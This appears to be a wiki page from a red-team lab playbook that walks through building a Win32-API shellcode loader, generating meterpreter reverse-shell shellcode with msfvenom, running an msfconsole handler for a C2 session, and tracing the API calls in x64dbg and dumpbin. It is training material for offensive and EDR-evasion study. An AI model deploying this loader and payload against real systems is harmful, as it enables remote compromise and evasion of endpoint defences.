Skip to content

08: Chapter 4 | LAB Exercise Playbook

VirtualAllocEx edited this page Aug 7, 2023 · 52 revisions

Exercise: Win32-API Loader

In this exercise we will create our first shellcode loader based on Win32 APIs (high level APIs). This loader will be our reference for further development into a direct syscall and indirect syscall loader.

Prinicipal_Win32-apis

The code template for this tutorial can be found here.

Exercise tasks:

Build Win32-API Loader

Task Nr. Task Description
1 Download the Win32-API Loader POC for this chapter.
2 The code in the POC is partially complete. Following the instructions in this playbook, the student's task is to complete the code. They must use the code provided for the four Windows APIs and place them in the correct order in the code.
3 Then you have to create the meterpreter shellcode, paste it into the loader and compile the loader.
4 Create and run a staged x64 meterpreter listener using msfconsole.
5 Run your compiled .exe and check that a stable command and control channel opens.

Analyse Win32-API Loader

Task Nr. Task Description
6 Use the Visual Studio dumpbin tool to analyse the Win32-API Loader. Are any Win32 APIs being imported from kernel32.dll? Is the result what you expected?
7 Use x64dbg to debug or analyse the Win32-API Loader.
  • Check which Win32 APIs and native APIs are being imported. If they are being imported, from which module or memory location are they being imported? Is the result what you expected?
  • Check from which module or memory location the syscalls for the four APIs used are being executed. Is the result what you expected?
  • etc.

Visual Studio

The technical functionality of the Win32 API loader is relatively simple and therefore, in my opinion, perfect for rewriting the Win32 API loader step by step into a low level loader using direct or indirect system calls. The code for the Win32 API loader works like this.

Thread Function

First, we need to define the thread function ExecuteShellcode which is later needed in the code for executing our shellcode. A thread function is a function that is executed when a new thread is started. In Windows, when a new thread is created using CreateThread, it expects a pointer to a function. This function, which we can refer to as the "thread function", is the starting address of the code (our shellcode) that will be executed in the new thread.

// Define the thread function for executing shellcode
// This function will be executed in a separate thread created later in the main function
DWORD WINAPI ExecuteShellcode(LPVOID lpParam) {
    // Create a function pointer called 'shellcode' and initialize it with the address of the shellcode
    void (*shellcode)() = (void (*)())lpParam;

    // Call the shellcode function using the function pointer
    shellcode();

    // Return 0 as the thread exit code
    return 0;
}

Shellcode

Within the main function, the variable code is defined, which is responsible for storing the meterpreter shellcode. The content of code is stored in the .text (code) section of the PE structure or, if the shellcode is larger than 255 bytes, the shellcode is stored in the .rdata section.

// Insert the Meterpreter shellcode as an array of unsigned chars (replace the placeholder with actual shellcode)
    unsigned char code[] = "\xfc\x48\x83...";

VirtualAlloc

The VirtualAlloc Win32 API is used to reserve, commit, or change the state of a region of pages in the virtual address space of the calling process. This code block defines the function pointer void, which points to the variable exec and stores the return address of the allocated memory using the Windows API VirtualAlloc. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.

// Allocate Virtual Memory with PAGE_EXECUTE_READWRITE permissions to store the shellcode
    // 'exec' will hold the base address of the allocated memory region
    void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);

WriteProcessMemory

The WriteProcessMemory function provided by the Windows API writes data to an area of memory in a specified process. The entire area to be written must be accessible (allocated memory, which in our case was previously done by using VirtualAlloc), and attempts to write to inaccessible memory will result in an error. Using WriteProcessMemory copies the meterpreter shellcode into the allocated or committed memory. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.

// Copy the shellcode into the allocated memory region using WriteProcessMemory
    SIZE_T bytesWritten;
    WriteProcessMemory(GetCurrentProcess(), exec, code, sizeof(code), &bytesWritten);

CreateThread

The Win32 CreateThread API allows you to create a new thread of execution within your process. In our case, we are using this API to run our shellcode in a new thread rather than in the main thread. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.

    // Create a new thread to execute the shellcode
    // Pass the address of the ExecuteShellcode function as the thread function, and 'exec' as its parameter
    // The returned handle of the created thread is stored in hThread
    HANDLE hThread = CreateThread(NULL, 0, ExecuteShellcode, exec, 0, NULL); 

WaitForSingleObject

And by using the Windows API WaitForSingleObject, we ensure that the shellcode thread completes its execution before the main thread exits. With WaitForSingleObject, the shellcode would still be executed correctly, but when the main thread exits and returns from main(), the process itself may exit, killing all threads that are still running. This includes the shellcode thread, which would be abruptly terminated even if it had not finished executing. This is why WaitForSingleObject is important and necessary. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation

// Wait for the shellcode execution thread to finish executing
    // This ensures the main thread doesn't exit before the shellcode has finished running
    WaitForSingleObject(hThread, INFINITE);    

Task

Your task now is to complete the Win32 API loader POC by using the following code for the required Windows APIs. Remember that a correct order is required, allocate memory, copy shellcode into memory, execute in a new thread, and wait to exit the main thread until the new thread has been created.

Code
// Create a new thread to execute the shellcode
    // Pass the address of the ExecuteShellcode function as the thread function, and 'exec' as its parameter
    // The returned handle of the created thread is stored in hThread
    HANDLE hThread = CreateThread(NULL, 0, ExecuteShellcode, exec, 0, NULL);

    // Copy the shellcode into the allocated memory region using WriteProcessMemory
    SIZE_T bytesWritten;
    WriteProcessMemory(GetCurrentProcess(), exec, code, sizeof(code), &bytesWritten);

    // Allocate Virtual Memory with PAGE_EXECUTE_READWRITE permissions to store the shellcode
    // 'exec' will hold the base address of the allocated memory region
    void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
   
    // Wait for the shellcode execution thread to finish executing
    // This ensures the main thread doesn't exit before the shellcode has finished running
    WaitForSingleObject(hThread, INFINITE);

Meterpreter Shellcode

Task

In this step, we will create our meterpreter shellcode for the Win32-API Loader with msfvenom in Kali Linux. To do this, we will use the following command and create x64 staged meterpreter shellcode.

kali>

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IPv4_Redirector_or_IPv4_Kali LPORT=80 -f c > /tmp/shellcode.txt

image

The shellcode can then be copied into the Win32-API Loader POC by replacing the placeholder at the unsigned char, and the POC can be compiled as an x64 release.

image

MSF-Listener

Task

Before we test the functionality of our Win32-API Loader, we need to create a listener within msfconsole.

kali>

msfconsole

msf>

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost IPv4_Redirector_or_IPv4_Kali
set lport 80 
set exitonsession false
run

image

Once the listener has been successfully started, you can run your compiled Win32-API Loader. If all goes well, you should see an incoming command and control session.

image

Loader Analysis: dumpbin

Task

The Visual Studio tool dumpbin can be used to check which Windows APIs are imported via kernel32.dll. The following command can be used to check the imports. Which results do you expect?

cmd>

cd C:\Program Files (x86)\Microsoft Visual Studio\2019\Community
dumpbin /imports Win32-API.exe
Results In the case of the Win32-API Loader, you should see that the Windows APIs VirtualAlloc, WriteProcessMemory, CreateThread and WaitForSingleObject are correctly imported into the Win32-API Loader from the kernel32.dll.

image

Loader Analysis: x64dbg

Task

The first step is to run your Win32-API Loader, check that the .exe is running and that a stable meterpreter C2 channel is open. Then we open x64dbg and attach to the running process, note that if you open the Win32-API Loader directly in x64dbg you need to run the assembly first.

image

image

Task

Then we want to check which APIs (Win32 or Native) or if the correct APIs are being imported and from which module or memory location. Remember that no direct syscalls or similar are used in the Win32-API Loader. What results do you expect?

Results

Checking the imported symbols in our Win32-API Loader, we should see that the Win32 APIs VirtualAlloc, WriteProcessMemory, CreateThread and WaitForSingleObject are imported from kernel32.dll. So the result is the same as with dumpbin and seems to be valid.

09

Task

We also want to check from which module or memory location the syscall stub of the native functions used is implemented, and also check from which module or memory location the syscall statement and return statement are executed.

Results

We use the "Follow imported address" function in the Symbols tab by right-clicking on one of the four Win32 APIs used, e.g. VirtualAlloc, and we can see that we jump to the location of kernel32.dll.

10

In the next step we use the function "Follow in Dissassembler" to follow the memory address that jumps to the memory of the kernelbase.dll.

11

12

Then we use the Follow in dissassembler function again and follow the address that calls the native function Nt* or ZwAllocateVirtualMemory from a memory location in ntdll.dll.

13

14

As expected, we go the normal way via malware.exe -> kernel32.dll -> kernelbase.dll -> ntdll.dll -> syscall. The following illustration shows, that the syscall instruction and the return instruction are executed from a memory region in ntdll.dll as expected.

15

Task

At the very least, we want to identify the meterpreter shellcode in the .text section of the shellcode loader. To do this, have a look at the dissassembled code of Win32API-Loader.exe.

Results

By using the "Follow in Disassembler" on the loader module, we can jump to the disassembled code from the shellcode loader. In my case, at the very top we can identify the meterpreter shellcode. As long as your shellcode size is less than or equal to 255 bytes, you will find the shellcode in the .text section of the shellcode loader. If the shellcode size is greater than 255 bytes, the shellcode will be stored in the .rdata section of the loader.

image

Summary: Win32-API Loader

  • Syscall execution via normal transition from Win32-API Loader.exe -> kernel32.dll -> kernelbase.dll -> ntdll.dll -> syscall
  • Win32-API Loader imports Windows APIs from kernel32.dll...
  • ...then accesses or imports the native functions from ntdll.dll...
  • ...and finally executes the code of the corresponding native function, including the syscall instruction.
  • If an EDR uses user mode hooking in kernel32.dll or ntdll.dll, the contents of malware.exe are redirected to the EDR's hooking.dll.